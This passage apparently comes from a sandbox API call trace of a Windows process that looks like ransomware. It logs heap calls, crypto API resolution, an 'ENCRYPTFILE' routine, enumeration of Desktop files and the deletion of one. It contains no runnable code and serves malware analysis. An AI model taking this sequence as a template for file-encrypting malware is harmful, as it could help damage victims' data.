HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca700 | out: hHeap=0x1780000) returned 1 [0120.148] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2750 | out: hHeap=0x1780000) returned 1 [0120.148] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2860 | out: hHeap=0x1780000) returned 1 [0120.148] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2900 | out: hHeap=0x1780000) returned 1 [0120.148] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0120.148] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca868 | out: hHeap=0x1780000) returned 1 [0120.148] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2830 | out: hHeap=0x1780000) returned 1 [0120.148] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9a0 | out: hHeap=0x1780000) returned 1 [0120.148] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2740 | out: hHeap=0x1780000) returned 1 [0120.148] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca880 | out: hHeap=0x1780000) returned 1 [0120.148] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28b0 | out: hHeap=0x1780000) returned 1 [0120.148] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9b8 | out: hHeap=0x1780000) returned 1 [0120.148] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2870 | out: hHeap=0x1780000) returned 1 [0120.148] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca838 | out: hHeap=0x1780000) returned 1 [0120.148] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2740 | out: hHeap=0x1780000) returned 1 [0120.148] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7a8 | out: hHeap=0x1780000) returned 1 [0120.148] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27f0 | out: hHeap=0x1780000) returned 1 [0120.148] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0120.148] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x1796ea8, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptReleaseContext", lpUsedDefaultChar=0x0) returned 20 [0120.149] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca940 | out: hHeap=0x1780000) returned 1 [0120.149] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796ea8 | out: hHeap=0x1780000) returned 1 [0120.149] GetProcAddress (hModule=0x756e0000, lpProcName="CryptReleaseContext") returned 0x756ffbc0 [0120.149] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfce8 | out: hHeap=0x1780000) returned 1 [0120.149] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28c0 | out: hHeap=0x1780000) returned 1 [0120.149] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2740 | out: hHeap=0x1780000) returned 1 [0120.149] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27d0 | out: hHeap=0x1780000) returned 1 [0120.149] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfab8 | out: hHeap=0x1780000) returned 1 [0120.149] CryptReleaseContext (hProv=0x41a5250, dwFlags=0x0) returned 1 [0120.149] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca820 | out: hHeap=0x1780000) returned 1 [0120.149] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25f0 | out: hHeap=0x1780000) returned 1 [0120.149] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9e8 | out: hHeap=0x1780000) returned 1 [0120.149] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8b0 | out: hHeap=0x1780000) returned 1 [0120.149] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2670 | out: hHeap=0x1780000) returned 1 [0120.149] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7c0 | out: hHeap=0x1780000) returned 1 [0120.149] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca880 | out: hHeap=0x1780000) returned 1 [0120.149] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25f0 | out: hHeap=0x1780000) returned 1 [0120.149] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca940 | out: hHeap=0x1780000) returned 1 [0120.149] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2840 | out: hHeap=0x1780000) returned 1 [0120.149] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2830 | out: hHeap=0x1780000) returned 1 [0120.149] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfc70 | out: hHeap=0x1780000) returned 1 [0120.149] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9d0 | out: hHeap=0x1780000) returned 1 [0120.149] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2760 | out: hHeap=0x1780000) returned 1 [0120.149] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca598 | out: hHeap=0x1780000) returned 1 [0120.149] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4d8 | out: hHeap=0x1780000) returned 1 [0120.149] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca730 | out: hHeap=0x1780000) returned 1 [0120.150] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca610 | out: hHeap=0x1780000) returned 1 [0120.150] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4f0 | out: hHeap=0x1780000) returned 1 [0120.150] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6b8 | out: hHeap=0x1780000) returned 1 [0120.150] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6a0 | out: hHeap=0x1780000) returned 1 [0120.150] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4a8 | out: hHeap=0x1780000) returned 1 [0120.150] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca718 | out: hHeap=0x1780000) returned 1 [0120.150] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca700 | out: hHeap=0x1780000) returned 1 [0120.150] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4c0 | out: hHeap=0x1780000) returned 1 [0120.150] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfba8 | out: hHeap=0x1780000) returned 1 [0120.150] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa00 | out: hHeap=0x1780000) returned 1 [0120.150] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca898 | out: hHeap=0x1780000) returned 1 [0120.150] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca850 | out: hHeap=0x1780000) returned 1 [0120.150] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca958 | out: hHeap=0x1780000) returned 1 [0120.150] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e9350 | out: hHeap=0x1780000) returned 1 [0120.150] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26c0 | out: hHeap=0x1780000) returned 1 [0120.150] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0120.150] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0120.150] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4392308 | out: hHeap=0x1780000) returned 1 [0120.150] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2710 | out: hHeap=0x1780000) returned 1 [0120.150] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2570 | out: hHeap=0x1780000) returned 1 [0120.150] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2580 | out: hHeap=0x1780000) returned 1 [0120.150] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a90b0 | out: hHeap=0x1780000) returned 1 [0120.150] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca928 | out: hHeap=0x1780000) returned 1 [0120.150] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2670 | out: hHeap=0x1780000) returned 1 [0120.150] FreeLibrary (hLibModule=0x756e0000) returned 1 [0120.150] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8f8 | out: hHeap=0x1780000) returned 1 [0120.150] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfc70 | out: hHeap=0x1780000) returned 1 [0120.150] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0120.150] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac600 | out: hHeap=0x1780000) returned 1 [0120.150] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0120.150] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8f48 | out: hHeap=0x1780000) returned 1 [0120.150] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca490 | out: hHeap=0x1780000) returned 1 [0120.151] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0120.151] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2710 | out: hHeap=0x1780000) returned 1 [0120.151] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796e48 | out: hHeap=0x1780000) returned 1 [0120.151] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26f0 | out: hHeap=0x1780000) returned 1 [0120.151] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2580 | out: hHeap=0x1780000) returned 1 [0120.151] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2710 | out: hHeap=0x1780000) returned 1 [0120.151] CloseHandle (hObject=0x2a0) returned 1 [0120.151] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6d0 | out: hHeap=0x1780000) returned 1 [0120.151] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2540 | out: hHeap=0x1780000) returned 1 [0120.151] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43eb450 | out: hHeap=0x1780000) returned 1 [0120.151] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac100 | out: hHeap=0x1780000) returned 1 [0120.151] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6e8 | out: hHeap=0x1780000) returned 1 [0120.151] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2700 | out: hHeap=0x1780000) returned 1 [0120.151] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfc98 | out: hHeap=0x1780000) returned 1 [0120.151] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca718 | out: hHeap=0x1780000) returned 1 [0120.151] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf9a0 | out: hHeap=0x1780000) returned 1 [0120.151] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca610 | out: hHeap=0x1780000) returned 1 [0120.151] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4c0 | out: hHeap=0x1780000) returned 1 [0120.151] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6b8 | out: hHeap=0x1780000) returned 1 [0120.151] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca598 | out: hHeap=0x1780000) returned 1 [0120.151] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6a0 | out: hHeap=0x1780000) returned 1 [0120.151] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca700 | out: hHeap=0x1780000) returned 1 [0120.151] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb80 | out: hHeap=0x1780000) returned 1 [0120.151] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0120.151] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2680 | out: hHeap=0x1780000) returned 1 [0120.151] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796e48 | out: hHeap=0x1780000) returned 1 [0120.151] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2580 | out: hHeap=0x1780000) returned 1 [0120.151] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25f0 | out: hHeap=0x1780000) returned 1 [0120.151] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26f0 | out: hHeap=0x1780000) returned 1 [0120.151] CloseHandle (hObject=0x258) returned 1 [0120.153] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca568 | out: hHeap=0x1780000) returned 1 [0120.153] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2560 | out: hHeap=0x1780000) returned 1 [0120.153] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\9PZJqif.m4a", nBufferLength=0x7fff, lpBuffer=0x143f190, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\9PZJqif.m4a", lpFilePart=0x0) returned 0x23 [0120.153] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\9PZJqif.m4a" (normalized: "c:\\users\\fd1hvy\\desktop\\9pzjqif.m4a")) returned 0x20 [0120.153] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\9PZJqif.m4a", lpFindFileData=0x144f1d8 | out: lpFindFileData=0x144f1d8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd910d10, ftCreationTime.dwHighDateTime=0x1d5e636, ftLastAccessTime.dwLowDateTime=0x7aad2b30, ftLastAccessTime.dwHighDateTime=0x1d5e25e, ftLastWriteTime.dwLowDateTime=0x7aad2b30, ftLastWriteTime.dwHighDateTime=0x1d5e25e, nFileSizeHigh=0x0, nFileSizeLow=0x8473, dwReserved0=0x356310, dwReserved1=0xdf0000, cFileName="9PZJqif.m4a", cAlternateFileName="")) returned 0x41ac500 [0120.154] DeleteFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\9PZJqif.m4a" (normalized: "c:\\users\\fd1hvy\\desktop\\9pzjqif.m4a")) returned 1 [0120.162] FindNextFileW (in: hFindFile=0x41ac500, lpFindFileData=0x144f1d8 | out: lpFindFileData=0x144f1d8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd910d10, ftCreationTime.dwHighDateTime=0x1d5e636, ftLastAccessTime.dwLowDateTime=0x7aad2b30, ftLastAccessTime.dwHighDateTime=0x1d5e25e, ftLastWriteTime.dwLowDateTime=0x7aad2b30, ftLastWriteTime.dwHighDateTime=0x1d5e25e, nFileSizeHigh=0x0, nFileSizeLow=0x8473, dwReserved0=0x356310, dwReserved1=0xdf0000, cFileName="9PZJqif.m4a", cAlternateFileName="")) returned 0 [0120.162] FindClose (in: hFindFile=0x41ac500 | out: hFindFile=0x41ac500) returned 1 [0120.162] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e22c0 [0120.162] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf388 [0120.162] CharUpperBuffW (in: lpsz="ENCRYPTFILE", cchLength=0xb | out: lpsz="ENCRYPTFILE") returned 0xb [0120.162] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf608 [0120.162] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e21c0 [0120.162] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf630 [0120.162] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9b78 [0120.162] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2160 [0120.162] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9950 [0120.162] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2240 [0120.162] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796ea8 [0120.162] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9890 [0120.162] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e22c0 [0120.163] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8f00 [0120.163] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e21d0 [0120.163] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9890 [0120.163] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc0) returned 0x1b22250 [0120.163] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43c9890 [0120.163] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf658 [0120.163] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9bf0 [0120.163] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e21d0 [0120.163] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d58 [0120.163] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9dd0 [0120.163] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a9218 [0120.163] PeekMessageW (in: lpMsg=0x144f534, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f534) returned 0 [0120.163] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2150 [0120.163] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2220 [0120.163] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796d68 [0120.163] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2320 [0120.163] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf838 [0120.163] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9e60 [0120.163] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e22f0 [0120.163] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9c50 [0120.163] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\A2BeonpxV2cn0bIC.png", lpFindFileData=0x144f078 | out: lpFindFileData=0x144f078*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x73b60650, ftCreationTime.dwHighDateTime=0x1d5e12b, ftLastAccessTime.dwLowDateTime=0xfe4a440, ftLastAccessTime.dwHighDateTime=0x1d5e2b8, ftLastWriteTime.dwLowDateTime=0xfe4a440, ftLastWriteTime.dwHighDateTime=0x1d5e2b8, nFileSizeHigh=0x0, nFileSizeLow=0x8ef9, dwReserved0=0x10189fc, dwReserved1=0x8, cFileName="A2BeonpxV2cn0bIC.png", cAlternateFileName="A2BEON~1.PNG")) returned 0x41ac200 [0120.163] FindClose (in: hFindFile=0x41ac200 | out: hFindFile=0x41ac200) returned 1 [0120.164] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2180 [0120.164] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796ee8 [0120.164] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2200 [0120.164] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4392650 [0120.164] CharUpperBuffW (in: lpsz="_WINAPI_FILEINUSE", cchLength=0x11 | out: lpsz="_WINAPI_FILEINUSE") returned 0x11 [0120.164] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf388 [0120.164] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2160 [0120.164] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf7c0 [0120.164] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9c80 [0120.164] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e21e0 [0120.164] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9cb0 [0120.164] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43c9bd8 [0120.164] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf810 [0120.164] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9c20 [0120.164] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e22f0 [0120.164] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf838 [0120.164] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9cc8 [0120.164] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9ce0 [0120.164] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a90b0 [0120.164] PeekMessageW (in: lpMsg=0x144f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f114) returned 0 [0120.164] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf360 [0120.164] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9c50 [0120.164] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2300 [0120.164] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9cf8 [0120.164] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d28 [0120.164] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2130 [0120.164] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2200 [0120.164] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4392420 [0120.164] CharUpperBuffW (in: lpsz="_WINAPI_CREATEFILEEX", cchLength=0x14 | out: lpsz="_WINAPI_CREATEFILEEX") returned 0x14 [0120.165] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf428 [0120.165] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2150 [0120.165] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf450 [0120.165] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9c20 [0120.165] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e21e0 [0120.165] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9e60 [0120.165] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e21e0 [0120.165] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9e00 [0120.165] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e21f0 [0120.165] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e21f0 [0120.165] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d70 [0120.165] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2220 [0120.165] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43c9d88 [0120.165] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf4a0 [0120.165] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9e78 [0120.165] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2200 [0120.165] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf4c8 [0120.165] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9b90 [0120.165] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9e78 [0120.165] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf888 [0120.165] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9c38 [0120.165] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2220 [0120.165] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfd38 [0120.165] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9c98 [0120.165] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfba8 [0120.165] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d10 [0120.165] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2240 [0120.165] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d28 [0120.165] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2230 [0120.165] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfd10 [0120.166] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9c38 [0120.166] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2230 [0120.166] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9c68 [0120.166] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2590 [0120.166] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb08 [0120.166] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d40 [0120.166] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2660 [0120.166] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4392688 [0120.166] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d40 [0120.166] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25b0 [0120.166] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb80 [0120.166] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca568 [0120.166] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2630 [0120.166] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 